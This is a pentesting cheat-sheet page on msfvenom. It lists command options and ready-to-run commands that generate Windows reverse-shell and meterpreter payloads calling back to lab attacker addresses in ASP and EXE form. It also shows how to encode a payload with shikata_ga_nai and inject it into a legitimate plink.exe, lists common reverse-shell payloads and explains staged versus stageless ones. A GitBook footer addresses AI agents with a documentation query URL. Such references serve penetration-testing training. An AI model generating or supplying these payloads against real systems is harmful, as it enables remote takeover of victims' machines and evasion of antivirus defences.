> For the complete documentation index, see [llms.txt](https://gitbook.nori-zamurai.com/llms.txt). Markdown versions of documentation pages are available by appending `.md` to page URLs; this page is available as [Markdown](https://gitbook.nori-zamurai.com/pentesting-cheatsheets/paylaod/msfvenom.md).
# Msfvenom
### Command Options
```
-p, --payload: Payload to use. Specify a '-' or stdin to use custom payloads
-b, --bad-chars: The list of characters to avoid
-f, --format: Output format
-a, --arch: The architecture to use
--platform: The platform of the payload
-v, --var-name: Specify a custom variable name to use for certain output formats
-e, --encoder: The encoder to use
```
{% embed url="" %}
### Examples of Usage
```
msfvenom -l payloads | grep x86
# List paylaods
msfvenom -p windows/shell_reverse_tcp --list-options
# Display paylaod options
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.0.75 LPORT=4444 -f asp -o tcp_shell.asp
msfvenom -a x86 --platform windows -p windows/shell_reverse_tcp LHOST=10.11.0.75 LPORT=1234 -f exe -o tcp_shell.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -o shell_reverse.exe
msfvenom -p windows/shell_reverse_tcp LHOST=10.11.0.5 LPORT=4444 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
#PEファイルへのinjection
msfvenom -p windows/meterpreter/reverse_https LHOST=10.11.0.5 LPORT=443 -f exe -o met_https_reverse.exe
```
### List of commonly used payloads
```
windows/shell/reverse_tcp
windows/x64/shell/reverse_tcp
windows/meterpreter/reverse_tcp
windows/x64/meterpreter/reverse_tcp
windows/shell_reverse_tcp
windows/x64/shell_reverse_tcp
windows/meterpreter_reverse_tcp
windows/x64/meterpreter_reverse_tcp
```
### Staged vs Stageless payloads
> Staged payloads are denoted with the use of a forward slash (**/**; e.g. **windows/shell/reverse\_tcp**). Staged payloads send a small stager to the target, which connects back to the attacker and downloads the rest of the payload. Therefore, staged payloads need special payload listeners, such as **multi/handler** in Metasploit. Staged payloads are ideal in situations where you have limited shellcode space, most commonly in Buffer Overflows (but that’s a story for another day)
>
> Stageless payloads are denoted with the use of an underscore (**\_**; e.g. **windows/shell\_reverse\_tcp**). Stageless payloads send the entire payload to the target at once, and therefore don’t require the attacker to provide more data. That means we have a variety of listeners we can use, such as Netcat. Find out how to set up a listener using Netcat/Ncat in my post [here](https://medium.com/@PenTest_duck/offensive-netcat-ncat-from-port-scanning-to-bind-shell-ip-whitelisting-834689b103da?source=friends_link\&sk=774174bfcb283864cf4468d2db460d0e).
{% embed url="" %}
### Link
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
{% embed url="" %}
---
# Agent Instructions
This documentation is published with GitBook. GitBook is the documentation platform designed so that both humans and AI agents can read, navigate, and reason over technical content effectively. Learn more at gitbook.com.
## Querying This Documentation
If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question.
Perform an HTTP GET request on the current page URL with the `ask` query parameter, and the optional `goal` query parameter:
```
GET https://gitbook.nori-zamurai.com/pentesting-cheatsheets/paylaod/msfvenom.md?ask=&goal=
```
`ask` is the immediate question: it should be specific, self-contained, and written in natural language.
`goal` is optional and describes the broader end goal you are ultimately trying to accomplish on behalf of the user. GitBook uses it to tailor the answer towards what is most useful for that goal.
The response will contain a direct answer to the question and relevant excerpts and sources from the documentation.
Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.